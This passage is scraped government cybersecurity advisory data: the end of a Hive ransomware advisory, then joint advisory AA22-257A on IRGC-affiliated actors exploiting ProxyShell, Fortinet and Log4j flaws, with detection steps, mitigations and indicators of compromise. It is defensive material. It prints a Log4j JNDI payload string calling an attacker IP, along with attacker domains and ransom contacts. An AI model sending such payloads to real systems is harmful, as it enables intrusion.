Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. 
\n\n#### **Protective Controls and Architecture**\n\n * **Segment networks** to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement.\n * **Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool**. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * Install, regularly update, and enable real-time detection for antivirus software on all hosts.\n\n#### **Vulnerability and Configuration Management**\n\n * **Consider adding an email banner to emails** received from outside your organization.\n * **Disable command-line and scripting activities and permissions**. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.\n * **Ensure devices are properly configured and that security features are enabled**.\n * **Restrict Server Message Block (SMB) Protocol within the network to only access necessary servers and remove or disable outdated versions of SMB** (i.e., SMB version 1). 
Threat actors use SMB to propagate malware across organizations.\n\n#### **REFERENCES**\n\n * [Stopransomware.gov](<http://www.stopransomware.gov/>) is a whole-of-government approach that gives one central location for ransomware resources and alerts.\n * Resource to mitigate a ransomware attack: [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf>).\n * No-cost cyber hygiene services: [Cyber Hygiene Services](<https://www.cisa.gov/cyber-hygiene-services>) and [Ransomware Readiness Assessment](<https://github.com/cisagov/cset/>).\n\n#### **INFORMATION REQUESTED**\n\nThe FBI, CISA, and HHS do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim\u2019s files will be recovered. However, the FBI, CISA, and HHS understand that when businesses are faced with an inability to function, executives will evaluate all options to protect their shareholders, employees, and customers. Regardless of whether you or your organization decide to pay the ransom, the FBI, CISA, and HHS urge you to promptly report ransomware incidents to your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>), or to CISA at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870. Doing so provides investigators with the critical information they need to track ransomware attackers, hold them accountable under US law, and prevent future attacks. 
\n\nThe FBI may seek the following information that you determine you can legally share, including:\n\n * Recovered executable files\n * Live random access memory (RAM) capture\n * Images of infected systems\n * Malware samples\n * IP addresses identified as malicious or suspicious\n * Email addresses of the attackers\n * A copy of the ransom note\n * Ransom amount\n * Bitcoin wallets used by the attackers\n * Bitcoin wallets used to pay the ransom\n * Post-incident forensic reports\n\n#### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. FBI, CISA, and HHS do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI, CISA, or HHS.\n\n### Revisions\n\nInitial Version: November 17, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-25T12:00:00", "type": "ics", "title": "#StopRansomware: Hive Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-42321", "CVE-2023-26360"], "modified": "2022-11-25T12:00:00", "id": "AA22-321A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-321a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T17:09:43", "description": "### Summary\n\nActions to take today to protect against ransom operations:\n\n\u2022 Keep systems and software updated and prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Enforce MFA. \n\u2022 Make offline backups of your data.\n\nThis joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) - Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom\u2019s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government\u2019s Islamic Revolutionary Guard Corps (IRGC). **Note**: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. 
Hereafter, this advisory refers to all the coauthors of this advisory as \"the authoring agencies.\"\n\nThis advisory updates joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.\n\nSince the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report [APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>) from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.\n\nThe IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. 
The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.\n\nThis advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.\n\nFor a downloadable copy of IOCs, see [AA22-257A.stix](<https://www.us-cert.gov/sites/default/files/AA22-257A.stix.xml>).\n\nFor more information on Iranian state-sponsored malicious cyber activity, see CISA\u2019s [Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) webpage and FBI\u2019s [Iran Threat](<https://www.fbi.gov/investigate/counterintelligence/the-iran-threat>) webpage.\n\n### Technical Details\n\n#### Threat Actor Activity\n\nAs reported in joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: [CVE-2018-13379](<https://vulners.com/cve/CVE-2018-13379>), [CVE-2020-12812](<https://vulners.com/cve/CVE-2020-12812>), [CVE-2019-5591](<https://vulners.com/cve/CVE-2019-5591>), and [CVE-2021-34473](<https://vulners.com/cve/CVE-2021-34473>) (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. 
networks in combination with ProxyShell vulnerabilities [CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>) and [CVE-2021-31207](<https://vulners.com/cve/CVE-2021-31207>). The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.\n\nSince the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities [CVE-2021-44228](<https://vulners.com/cve/CVE-2021-44228>) (\u201cLog4Shell\u201d), [CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>), and [CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) for initial access.\n\nThe IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. 
The actors may sell the data or use the exfiltrated data in extortion operations or \u201cdouble extortion\u201d ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.\n\nIRGC-affiliated actor activity observed by the authoring agencies includes:\n\n * In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.\n * In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), on a Microsoft Exchange server to gain access to the network of a U.S. regional transportation company. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom. This activity disrupted the transportation company\u2019s operations for an extended period.\n * In February 2022, the actors exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) in a VMware Horizon application to gain access to the network of a U.S. municipal government, move laterally within the network, establish persistent access, initiate crypto-mining operations, and conduct additional malicious activity.\n * In February 2022, the actors may have exploited a Log4j vulnerability (likely CVE-2021-44228, CVE-2021-45046, and/or CVE-2021) to gain access to the network of a U.S. aerospace company. 
The actors leveraged a server that the authoring agencies assess is associated with the IRGC-affiliated actors to exfiltrate data from the company's network.\n\n#### MITRE ATT&CK\u00ae Tactics and Techniques\n\nNote: This advisory uses the MITRE [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v11/techniques/enterprise/>) framework, version 11. See Appendix B for a table of the MITRE ATT&CK tactics and techniques observed.\n\nThe authoring agencies assess the following tactics and techniques are associated with this activity.\n\n#### Resource Development [[TA0042](<https://attack.mitre.org/versions/v11/tactics/TA0042>)]\n\nThe IRGC-affiliated actors have used the following malicious and legitimate tools [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001>), [T1588.002](<https://attack.mitre.org/versions/v11/techniques/T1588/002>)] for a variety of tactics across the enterprise spectrum:\n\n * Fast Reverse Proxy (FRP) for command and control (C2)\n * Plink for C2\n * Remote Desktop Protocol (RDP) for lateral movement\n * BitLocker for data encryption\n * SoftPerfect Network Scanner for system network configuration discovery\n\nNote: For additional tools used by these IRGC-affiliated cyber actors, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n#### Initial Access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)]\n\nAs stated in the Technical Details section previously reported in joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>), the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)].\n\nThe 
following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:\n\n * Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories: \n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\\n * C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\n * C:\\inetpub\\wwwroot\\aspnet_client\\\n\nThe following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:\n\n * ${jndi:ldap//148.251.71.182:1389/RCE} (user agent string)\n * RCE.class\n\n#### Execution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002>)]\n\nThe IRGC-affiliated actors may have made modifications to the Task Scheduler [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005>)]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:\n\n * Wininet\n * Wininet\u2019\n * WinLogon\n * CacheTask\n\nNote: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n#### Persistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003>)]\n\nThe IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [[T1136.001](<https://attack.mitre.org/versions/v11/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v11/techniques/T1136/002>)]. 
The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:\n\n * Domain Admin\n * it_admin\n * DefaultAccount\n * Default01\n\nNote: For additional account usernames associated with this activity, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n#### Exfiltration [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)]\n\nThe authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:\n\n * C:\\Windows\\Temp\\sassl[.]pmd\n * C:\\Windows\\Temp\\ssasl[.]zip\n * C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]dmp\n * C:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]zip\n\n#### Impact [[TA0040](<https://attack.mitre.org/versions/v11/tactics/TA0040>)]\n\nThe IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [[T1486](<https://attack.mitre.org/versions/v10/techniques/T1486>)] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity\u2019s networked printer(s). 
The notes included the following contact information:\n\n * @BuySafety (Telegram)\n * @WeRBits (Telegram)\n * +93794415076 (WhatsApp)\n * werbits@onionmail[.]org\n * buysafety@onionmail[.]org\n * yacashcash@rambler[.]ru\n\nNote: For additional contact information included in ransom notes, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\n### DETECTION\n\nThe authoring agencies recommend that organizations using Microsoft Exchange servers, Fortinet devices, and/or VMware Horizon applications investigate potential suspicious activity in their networks.\n\n * Search for IOCs. Collect known-bad IOCs and search for them in network and host artifacts. \n * **Note**: Refer to Appendix A for IOCs.\n * Review Log4j vulnerabilities, including CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105.\n * Review Microsoft Exchange ProxyShell vulnerabilities, including CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n * As a precaution, review additional Microsoft Exchange vulnerabilities, including CVE-2021-31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470, because the authoring agencies have seen the actors broadly target Microsoft Exchange servers.\n * Investigate exposed Microsoft Exchange servers, both patched and unpatched, for compromise.\n * Review Fortinet FortiOS vulnerabilities, including CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.\n * Review VMware vulnerabilities, including any relevant vulnerabilities listed on the VMware security advisory page.\n * Investigate changes to RDP, firewall, and Windows Remote Management (WinRM) configurations that may allow malicious cyber actors to maintain persistent access.\n * Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.\n * Review Task Scheduler for unrecognized 
scheduled tasks. Additionally, manually review operating-system and scheduled tasks\u2014including each step these tasks perform\u2014for unrecognized \u201cactions.\u201d\n * Review antivirus logs for indications they were unexpectedly turned off.\n * Look for WinRAR and FileZilla in unexpected locations.\n * Review servers and workstations for malicious executable files masquerading as legitimate Windows processes. Malicious files may not be found in the expected directory and may have cmd.exe or powershell.exe as their parent process.\n\nNote: For additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.\n\n### Mitigations\n\nThe authoring agencies urge network defenders to prepare for and mitigate potential cyber threats immediately by implementing the mitigations below.\n\n#### Implement and Enforce Backup and Restoration Policies and Procedures\n\n * Maintain offline (i.e., physically disconnected) backups of data, and regularly test backup and restoration. These practices safeguard an organization\u2019s continuity of operations or at least minimize potential downtime from a ransomware or other destructive data incident and protect against data losses. 
\n * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure.\n * Activate BitLocker on all networks and securely back up BitLocker keys with Microsoft and with an independent offline backup.\n * Create, maintain, and exercise a basic cyber incident response plan that includes response procedures for a ransom incident.\n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n\n#### Patch and Update Systems\n\n * U.S. federal, state, local, tribal, and territorial (SLTT) government and critical infrastructure organizations: Implement free [CISA Cyber Hygiene Services Vulnerability Scanning](<https://www.cisa.gov/cyber-hygiene-services>) to enable continuous scans of public, static IPs for accessible services and vulnerabilities.\n * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released. Regularly check for software updates and end-of-life notifications. Consider leveraging a centralized patch management system to automate and expedite the process.\n * Immediately patch software affected by vulnerabilities identified in this advisory: CVE-2021-34473, CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, CVE-2021-34523, CVE-2021-31207, CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-31196, CVE-2021-31206, CVE-2021-33768, CVE-2021-33766, and CVE-2021-34470.\n\n#### Evaluate and Update Blocklists and Allowlists\n\n * Regularly evaluate and update blocklists and allowlists.\n * If FortiOS is not used by your organization, add the key artifact files used by FortiOS to your organization\u2019s execution blocklist. 
Prevent any attempts to install or run this program and its associated files.\n\n#### Implement Network Segmentation\n\n * Implement network segmentation to restrict a malicious threat actor\u2019s lateral movement.\n\n#### Secure User Accounts\n\n * Audit user accounts with administrative privileges and configure access controls under the principles of least privilege and separation of duties.\n * Require administrator credentials to install software.\n\n#### Implement Multifactor Authentication\n\n * Use multifactor authentication where possible, particularly for webmail, virtual private networks (VPNs), accounts that access critical systems, and privileged accounts that manage backups.\n\n#### Use Strong Passwords\n\n * Require all accounts with password logins to have strong, unique passwords. See CISA Tip [Choosing and Protecting Passwords](<https://www.cisa.gov/tips/st04-002>) and National Institute of Standards and Technology (NIST) [Special Publication 800-63B: Digital Identity Guidelines](<https://csrc.nist.gov/publications/detail/sp/800-63b/final>) for more information.\n\n#### Secure and Monitor RDP and other Potentially Risky Services\n\n * If you use RDP, restrict it to limit access to resources over internal networks. After assessing risks, if your organization deems RDP operationally necessary, restrict the originating sources, and require MFA to mitigate credential theft and reuse. 
If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices.\n * Disable unused remote access/RDP ports.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts (to block brute-force campaigns), and log RDP login attempts.\n\n#### Use Antivirus Programs\n\n * Install and regularly update antivirus and anti-malware software on all hosts.\n\n#### Secure Remote Access\n\n * Only use secure networks.\n * Consider installing and using a VPN for remote access.\n\n### VALIDATE SECURITY CONTROLS\n\nIn addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.\n\nTo get started:\n\n 1. Select an ATT&CK technique described in this advisory (see Appendix B).\n 2. Align your security technologies against the technique.\n 3. Test your technologies against the technique.\n 4. Analyze your detection and prevention technologies' performance.\n 5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\n 6. 
Tune your security program, including people, processes, and technologies, based on the data generated by this process.\n\nThe authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.\n\n### RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS\n\nIf a ransomware or extortion incident occurs at your organization:\n\n * Follow the Ransomware Response Checklist on page 11 of the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C_.pdf>).\n * Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.\n * Follow the notification requirements as outlined in your cyber incident response plan. \n * **U.S. organizations**: Report incidents to FBI at a [local FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI's 24/7 CyWatch at (855) 292-3937 or cywatch@fbi.gov, CISA\u2019s 24/7 Operations Center at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870, or the U.S. 
Secret Service (USSS) at a [USSS Field Office](<http://www.secretservice.gov/contact/field-offices/>).\n * **Australian organizations**: Visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.\n * **Canadian organizations**: Report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>).\n * **United Kingdom organizations**: Report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://report.ncsc.gov.uk/>) (monitored 24 hours).\n * Apply incident response best practices found in the joint Cybersecurity Advisory, [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>), developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.\n\n**Note**: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.\n\n### **RESOURCES**\n\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/english>) website for more information and how to report information securely.\n * For more information on Iranian government-sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>) and FBI\u2019s [Iran Threat](<https://www.fbi.gov/investigate/counterintelligence/the-iran-threat>) page.\n * For information and resources on protecting against and responding to ransomware or extortion activity, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), the U.S. 
centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.\n * ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at [cyber.gov.au](<https://www.cyber.gov.au/>) and via 1300 292 371 (1300 CYBER1).\n\n### **PURPOSE**\n\nThis advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **DISCLAIMER**\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **APPENDIX A: INDICATORS OF COMPROMISE**\n\nIP addresses and executable files are listed below. 
For a downloadable copy of IOCs, see [AA22-257A.stix](<https://www.us-cert.gov/sites/default/files/AA22-257A.stix.xml>).\n\n#### **IP Addresses**\n\n * 54.39.78[.]148\n * 95.217.193[.]86\n * 104.168.117[.]149\n * 107.173.231[.]114\n * 144.76.186[.]88\n * 148.251.71[.]182\n * 172.245.26[.]118\n * 185.141.212[.]131\n * 198.12.65[.]175\n * 198.144.189[.]74\n\nNote: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.\n\n#### **Malicious Domains**\n\n * newdesk[.]top\n * symantecserver[.]co\n * msupdate[.]us\n * msupdate[.]top\n * gupdate[.]us\n * aptmirror[.]eu\n * buylap[.]top\n * winstore[.]us\n * tcp443[.]org\n * mssync[.]one\n * upmirror[.]top\n * tcp443 (subdomain)\n * kcp53 (subdomain)\n\n#### **Files**\n\nMalicious files observed in this activity are identified in Table 1. Many of the below malicious files are masquerading as legitimate Windows files; therefore, file names alone should not be treated as an indicator of compromise. 
Note: For additional malicious files observed, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\nFilename:\n\n| \n\nWininet[.]xml \n \n---|--- \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\wininet[.]xml \n \nMD5:\n\n| \n\nd2f4647a3749d30a35d5a8faff41765e \n \nSHA-1:\n\n| \n\n0f676bc786db3c44cac4d2d22070fb514b4cb64c \n \nSHA-256:\n\n| \n\n559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e \n \nFilename:\n\n| \n\nWininet\u2019[.]xml \n \nMD5:\n\n| \n\n2e1e17a443dc713f13f45a9646fc2179 \n \nSHA-1:\n\n| \n\ne75bfc0dd779d9d8ac02798b090989c2f95850dc \n \nFilename:\n\n| \n\nWinLogon[.]xml \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\WinLogon[.]xml \n \nMD5:\n\n| \n\n49c71178fa212012d710f11a0e6d1a30 \n \nSHA-1:\n\n| \n\n226f0fbb80f7a061947c982ccf33ad65ac03280f \n \nSHA-256:\n\n| \n\nbcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea \n \nFilename:\n\n| \n\nWininet[.]bat \n \nPath:\n\n| \n\nC:\\Windows\\wininet[.]bat \n \nMD5:\n\n| \n\n5f098b55f94f5a448ca28904a57c0e58 \n \nSHA-1:\n\n| \n\n27102b416ef5df186bd8b35190c2a4cc4e2fbf37 \n \nSHA-256:\n\n| \n\n668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0 \n \nFilename:\n\n| \n\nWinlogon[.]bat \n \nPath:\n\n| \n\nC:\\Windows\\winlogon[.]bat \n \nMD5:\n\n| \n\n7ac4633bf064ebba9666581b776c548f \n \nSHA-1:\n\n| \n\n524443dd226173d8ba458133b0a4084a172393ef \n \nSHA-256:\n\n| \n\nd14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7 \n \nFilename:\n\n| \n\nCacheTask[.]bat \n \nPath:\n\n| \n\nC:\\\\\\ProgramData\\Microsoft\\CacheTask[.]bat \n \nMD5:\n\n| \n\nee8fd6c565254fe55a104e67cf33eaea \n \nSHA-1:\n\n| \n\n24ed561a1ddbecd170acf1797723e5d3c51c2f5d \n \nSHA-256:\n\n| \n\nc1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837 \n \nFilename:\n\n| \n\nTask_update[.]exe \n \n---|--- \n \nPath:\n\n| 
